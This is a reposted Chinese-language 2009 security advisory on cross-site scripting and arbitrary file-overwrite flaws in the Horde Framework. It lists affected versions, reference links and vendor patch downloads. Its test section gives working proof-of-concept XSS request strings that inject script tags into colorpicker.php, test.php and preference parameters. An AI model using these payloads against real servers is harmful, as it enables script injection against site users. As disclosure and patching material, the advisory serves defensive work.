Horde跨站脚本和文件覆盖漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-10-09
Horde跨站脚本和文件覆盖漏洞 影响版本:
Horde Horde 3.3.x
Horde Horde 3.2.x漏洞描述:
BUGTRAQ  ID: 36382

Horde Framework是个以PHP为基础的架构,用于创建网络应用程序。

Horde应用框架中存在多个输入验证错误,远程安全者可以通过向服务器提交恶意请求执行脚本注入或跨站脚本安全。

1) 表单库在处理图形表单字段时可能导致覆盖任意本地文件。成功安全要求应用使用了受影响的图形字段(如Ansel或Turba)且拥有写权限。

2) MIME Viewer库在渲染某些文本部分时存在错误,用户查看恶意数据时就会导致在浏览器会话中执行任意HTML和脚本代码。

3) 偏好系统没有正确地过滤数字的偏好类型,可能导致在浏览器会话中执行任意HTML和脚本代码。<*参考 
Michael Slusarz (slusarz@horde.org)

链接:http://secunia.com/advisories/36665/
http://marc.info/?l=horde-announce&m=125291625030436&w=2
http://bugs.horde.org/ticket/?id=8311
http://bugs.horde.org/ticket/?id=8399
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert(’XSS’)</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert(’XSS’);%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert(’XSS’)</script>
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert(’XSS’)</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=onSEBUG安全建议:
厂商补丁:

Horde
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

ftp://ftp.horde.org/pub/horde/horde-3.2.5.tar.gz
http://ftp.horde.org/pub/horde/horde-3.2.5.tar.gz
ftp://ftp.horde.org/pub/horde/patches/patch-horde-3.2.4-3.2.5.gz
http://ftp.horde.org/pub/horde/patches/patch-horde-3.2.4-3.2.5.gz